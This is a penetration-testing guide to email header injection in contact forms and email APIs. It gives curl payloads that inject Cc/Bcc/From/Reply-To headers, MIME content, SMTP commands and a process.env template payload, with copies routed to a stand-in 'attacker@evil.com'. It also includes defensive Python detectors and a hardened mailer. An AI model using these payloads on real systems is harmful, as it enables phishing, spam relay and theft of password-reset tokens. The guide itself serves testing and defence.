Testing for Email Header Injection

When to Use

  • When testing contact forms, feedback forms, or "email a friend" functionality
  • During assessment of password reset email functionality
  • When testing newsletter subscription or notification email systems
  • During penetration testing of applications that send emails based on user input
  • When auditing email-related API endpoints for header injection

Prerequisites

  • Burp Suite for intercepting and modifying HTTP requests
  • Understanding of the SMTP protocol and email header structure
  • Knowledge of CRLF injection techniques (\r\n sequences)
  • Test email accounts for receiving injected emails
  • Access to application features that trigger email sending
  • Access to SMTP server logs for monitoring injection attempts

Workflow

Step 1 — Identify Email Injection Points

```bash
# Identify form fields that end up in email headers:
# - "From" name or email address fields
# - "To" or "CC" fields in sharing features
# - Subject line inputs
# - Reply-To fields

# Common endpoints:
# POST /contact         - Contact forms
# POST /share           - Share via email features
# POST /invite          - Invitation systems
# POST /api/send-email  - Email API endpoints
# POST /forgot-password - Password reset forms

# Test basic functionality first
curl -X POST http://target.com/contact \
  -d "name=Test&email=test@test.com&subject=Hello&message=Test message"
```

Step 2 — Test for CRLF Header Injection

```bash
# Inject additional email headers via CRLF in the email field
curl -X POST http://target.com/contact \
  -d "name=Test&email=test@test.com%0ACc:attacker@evil.com&message=Test"

# Inject BCC header
curl -X POST http://target.com/contact \
  -d "name=Test&email=test@test.com%0ABcc:attacker@evil.com&message=Test"

# Inject via the name field
curl -X POST http://target.com/contact \
  -d "name=Test%0ACc:attacker@evil.com&email=test@test.com&message=Test"

# Inject via the subject field
curl -X POST http://target.com/contact \
  -d "name=Test&email=test@test.com&subject=Hello%0ABcc:attacker@evil.com&message=Test"

# Try different CRLF encoding variants

# %0D%0A (CRLF)
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0D%0ACc:attacker@evil.com"

# %0A (LF only)
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0ACc:attacker@evil.com"

# %0D (CR only)
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0DCc:attacker@evil.com"

# Double encoding
curl -X POST http://target.com/contact \
  -d "email=test@test.com%250ACc:attacker@evil.com"
```
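Added example (Python, not part of the original guide): the encoding variants above seen from the defensive side. The check URL-decodes a submitted field a bounded number of times, so the double-encoded form is caught as well as the single-encoded ones, classifies which line-break variant survives decoding, and names the header that follows it. The sample submissions are constructed for the example and the addresses in them are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample submissions (assumption: a contact form posting name,
# email and subject); the address values are placeholders, not real mailboxes.
SAMPLE_SUBMISSIONS = [
    {"name": "Test", "email": "test@test.com", "subject": "Hello"},
    {"name": "Test", "email": "test@test.com%0D%0ACc:other@example.test"},  # CRLF
    {"name": "Test", "email": "test@test.com%0ACc:other@example.test"},     # LF only
    {"name": "Test", "email": "test@test.com%0DCc:other@example.test"},     # CR only
    {"name": "Test", "email": "test@test.com%250ACc:other@example.test"},   # double-encoded
    {"name": "Test\r\nBcc:other@example.test", "email": "test@test.com"},   # already decoded
]

# Bounded so that a value which keeps changing cannot turn this into a loop.
MAX_DECODE_ROUNDS = 3


def normalize(value: str) -> str:
    """URL-decode until the value stops changing, at most MAX_DECODE_ROUNDS times.

    A web framework decodes once; decoding again is what exposes the
    double-encoded form (%250A), which a later component may decode a second time.
    """
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def newline_variant(value: str):
    """Which line-break variant the decoded value contains: CRLF, LF, CR or None."""
    decoded = normalize(value)
    if "\r\n" in decoded:
        return "CRLF"
    if "\n" in decoded:
        return "LF"
    if "\r" in decoded:
        return "CR"
    return None


# A header name followed by a colon, directly after a line break.
HEADER_AFTER_BREAK = re.compile(r"[\r\n]+[ \t]*([A-Za-z][A-Za-z0-9-]*):")


def injected_headers(value: str):
    """Names of headers that would start on a new line, e.g. ['Cc']."""
    return HEADER_AFTER_BREAK.findall(normalize(value))


def scan_submission(params: dict):
    """Return (field, variant, header names) for every field carrying a line break."""
    findings = []
    for field, value in params.items():
        variant = newline_variant(value)
        if variant is not None:
            findings.append((field, variant, injected_headers(value)))
    return findings


if __name__ == "__main__":
    for submission in SAMPLE_SUBMISSIONS:
        print(scan_submission(submission) or "clean")
```

Run against the raw request parameters (before the framework decodes them) this behaves like a WAF rule; run against the decoded values it is the input check the application itself should perform. Note that the double-encoded sample classifies as LF: after the second decode round it is the same `\n` payload as the single-encoded one.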

Step 3 — Inject Custom Email Content

```bash
# Override the email body by injecting Content-Type and a body
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"

# Inject additional MIME parts
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"

# Override the From header for email spoofing
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0AFrom:ceo@target.com"

# Inject Reply-To for phishing
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0AReply-To:attacker@evil.com"
```

Step 4 — Test IMAP/SMTP Injection

```bash
# IMAP command injection via the search field
curl -X POST http://target.com/webmail/search \
  -d "query=test%0AEXAMINE INBOX"

# SMTP command injection
curl -X POST http://target.com/api/send \
  -d "to=test@test.com%0ARCPT TO:attacker@evil.com"

# SMTP VRFY command injection
curl -X POST http://target.com/api/verify \
  -d "email=test@test.com%0AVRFY admin"

# Test SMTP relay abuse
curl -X POST http://target.com/contact \
  -d "email=test@test.com%0ATo:victim1@target.com%0ATo:victim2@target.com%0ATo:victim3@target.com"
```

Step 5 — Test JSON-Based Email APIs

```bash
# JSON API header injection (the \n inside the JSON string is decoded by the JSON parser)
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":"test@test.com\nCc:attacker@evil.com","subject":"Test","body":"Test"}'

# Array injection for multiple recipients
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":["test@test.com","attacker@evil.com"],"subject":"Test","body":"Test"}'

# Template injection in the email body (inner quotes escaped so the JSON stays valid)
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":"test@test.com","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}'
```

Step 6 — Validate Findings

Check whether injected CC/BCC emails were received:

  • Monitor the attacker@evil.com inbox for received copies

Verify header injection via the email's raw source:

  • In the received email, check "View Original" or "Show Headers"
  • Look for injected Cc:, Bcc:, From:, or Reply-To: headers

Test whether the application is usable as a spam relay by injecting multiple recipients in BCC.

Document the full injection chain:

  1. Injection point (which field)
  2. Encoding required (CRLF, URL encoding)
  3. Impact (spam relay, phishing, data theft)
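Added example, not part of the original guide: a Python helper that performs the raw-source check above over a captured message of the kind a local capture server (mailhog or smtp4dev, listed under Tools) shows as "View Original". It reports single-use headers that occur more than once and recipient addresses outside the set the mailer is supposed to deliver to. Both message sources, the expected recipient and the address values are constructed for the example.

```python
import email
from email.utils import getaddresses

# Constructed raw message source (not from the original guide). The second From
# header and the Cc header are what a successful injection leaves behind.
INJECTED_SOURCE = """\
From: Contact Form <noreply@example.test>
To: inbox@example.test
Subject: Contact form submission
Cc: other@example.test
From: ceo@example.test
Content-Type: text/plain; charset=utf-8

name: Test
message: Test message
"""

# The same message as the contact form is meant to produce it.
CLEAN_SOURCE = """\
From: Contact Form <noreply@example.test>
To: inbox@example.test
Subject: Contact form submission
Content-Type: text/plain; charset=utf-8

name: Test
message: Test message
"""

# Headers the mailer sets once (or not at all); a second copy means injection.
SINGLE_USE = ("From", "Reply-To", "Subject", "Content-Type")
RECIPIENT_HEADERS = ("To", "Cc", "Bcc")


def analyze_headers(raw: str, expected_recipients=("inbox@example.test",)):
    """Compare a captured message's headers with what the mailer should have produced.

    Returns the single-use headers that occur more than once (with every value
    seen, in order) and every recipient address outside expected_recipients,
    tagged with the header it came from.
    """
    # compat32 policy (the default parser): header values come back as plain str
    msg = email.message_from_string(raw)
    duplicates = {}
    for name in SINGLE_USE:
        values = msg.get_all(name, [])
        if len(values) > 1:
            duplicates[name] = [str(v) for v in values]
    unexpected = []
    for name in RECIPIENT_HEADERS:
        for _display, addr in getaddresses(msg.get_all(name, [])):
            if addr and addr not in expected_recipients:
                unexpected.append((name, addr))
    return {"duplicate_headers": duplicates, "unexpected_recipients": unexpected}


if __name__ == "__main__":
    print(analyze_headers(INJECTED_SOURCE))
    print(analyze_headers(CLEAN_SOURCE))
```

Keeping the order of duplicate values matters for the report: the first From is the one the application wrote, the second is the injected one, which documents the injection chain item 1 (which field) once you know which form field feeds that header.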

Key Concepts

| Concept | Description |
|---|---|
| CRLF Injection | Injecting carriage return and line feed characters to create new email headers |
| Header Injection | Adding unauthorized headers (Cc, Bcc, From) to outgoing emails |
| Spam Relay | Abusing email functionality to send spam to arbitrary recipients |
| Email Spoofing | Modifying From or Reply-To headers to impersonate trusted senders |
| MIME Manipulation | Injecting MIME boundaries to override email body content |
| SMTP Command Injection | Injecting raw SMTP commands through unsanitized email parameters |
| Newline Characters | \r\n (CRLF), \n (LF), \r (CR) used to separate email headers |

Tools & Systems

| Tool | Purpose |
|---|---|
| Burp Suite | HTTP proxy for modifying email-related form submissions |
| swaks | Swiss Army Knife for SMTP testing and header injection validation |
| OWASP ZAP | Automated scanner with email injection detection |
| mailhog | Local SMTP testing server for capturing injected emails |
| smtp4dev | Development SMTP server for monitoring email injection results |
| Nuclei | Template scanner with email header injection detection templates |

Common Scenarios

  1. Spam Relay — Inject BCC headers to relay mass emails through the target's SMTP server, bypassing spam filters that trust the sender domain
  2. Phishing via Contact Form — Modify From and Reply-To headers to send phishing emails appearing to originate from the target organization
  3. Password Reset Hijack — Inject a CC header in the password reset flow to receive a copy of reset tokens sent to the victim
  4. Email Content Override — Inject MIME Content-Type headers to replace the legitimate email body with malicious phishing content
  5. Internal Email Abuse — Use header injection to send emails to internal addresses not normally accessible through the application

Output Format

```markdown
Email Header Injection Report

Findings

| # | Field | Payload | Result | Severity |
|---|---|---|---|---|
| 1 | email | test@test.com%0ACc:evil@evil.com | CC header injected | High |
| 2 | email | test@test.com%0ABcc:evil@evil.com | BCC header injected | High |
| 3 | name | Test%0AFrom:ceo@target.com | From spoofing | Medium |
```

Remediation

  • Validate email addresses with a strict regex that rejects newline characters
  • Strip \r, \n, and their encoded variants from all email-related input
  • Use parameterized email APIs that separate headers from data
  • Implement rate limiting on email-sending functionality
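Added example, not part of the original guide, covering the first three remediation points: a contact-form mailer written two ways in Python. The vulnerable version assembles the header block by string concatenation, which is the pattern every payload in this guide relies on; the hardened version validates the address against a strict pattern, strips CR/LF from free-text fields, and hands each value to the standard library's EmailMessage, which refuses a header value containing CR or LF. The destination address, the address pattern and the sample payload are assumptions made for the example.

```python
import re
from email.message import EmailMessage

# Strict address pattern for the example (assumption): one local part, one domain,
# no whitespace or control characters anywhere. It is deliberately narrower than
# RFC 5322; rejecting a rare but valid address is preferable to admitting a header.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")

INBOX = "inbox@example.test"  # fixed destination; never taken from the request


class InvalidInput(ValueError):
    """Raised when a submitted value must not reach the mailer."""


def validate_address(value: str) -> str:
    """Accept the address only if the whole string matches the strict pattern."""
    if ADDRESS_RE.fullmatch(value) is None:
        raise InvalidInput(f"rejected address: {value!r}")
    return value


def strip_line_breaks(value: str) -> str:
    """For free-text fields (name, subject): remove CR and LF instead of rejecting."""
    return re.sub(r"[\r\n]", "", value)


def build_vulnerable(name: str, sender: str, subject: str, body: str) -> str:
    """The pattern this guide tests for: a header block assembled by concatenation.

    Whatever the user submitted lands verbatim in the headers, so a value that
    contains CRLF followed by 'Bcc:' becomes a real Bcc header.
    """
    return (
        f"From: {name} <{sender}>\r\n"
        f"To: {INBOX}\r\n"
        f"Subject: {subject}\r\n"
        f"\r\n{body}"
    )


def build_hardened(name: str, sender: str, subject: str, body: str) -> str:
    """Validate first, then give each field to an API that treats it as one header value.

    EmailMessage raises ValueError for a header value containing CR or LF, so even
    a value that slipped past validation cannot turn into a second header.
    """
    sender = validate_address(sender)
    msg = EmailMessage()
    msg["From"] = f"{strip_line_breaks(name)} <{sender}>"
    msg["To"] = INBOX
    msg["Reply-To"] = sender
    msg["Subject"] = strip_line_breaks(subject)
    msg.set_content(body)
    return msg.as_string()


def header_names(message: str):
    """Names of the headers in a rendered message, in order, up to the first blank line."""
    names = []
    for line in re.split(r"\r\n|\r|\n", message):
        if line == "":
            break
        if ":" in line and not line[0].isspace():
            names.append(line.split(":", 1)[0])
    return names


def hardened_rejects(sender: str) -> bool:
    """True when the hardened builder refuses the sender value outright."""
    try:
        build_hardened("Test", sender, "Hello", "Test")
    except InvalidInput:
        return True
    return False


def api_refuses_newline(value: str) -> bool:
    """The library's own last line of defence: EmailMessage rejects CR/LF in a header."""
    try:
        EmailMessage()["Subject"] = value
    except ValueError:
        return True
    return False


# Constructed payload shaped like the Bcc injection tested in Step 2.
INJECTED_SENDER = "test@test.com\r\nBcc:other@example.test"

if __name__ == "__main__":
    print(header_names(build_vulnerable("Test", INJECTED_SENDER, "Hello", "Test")))
    print(hardened_rejects(INJECTED_SENDER), api_refuses_newline("Hello\r\nBcc:other@example.test"))
```

The two defences are layered on purpose: the strict pattern is the policy (only an address may be an address), and the parameterized API is the backstop that holds even if a free-text field is wired to a header by mistake later on. Reply-To is set by the application from the validated sender rather than taken from its own form field, which removes the Reply-To injection point from Step 3 entirely.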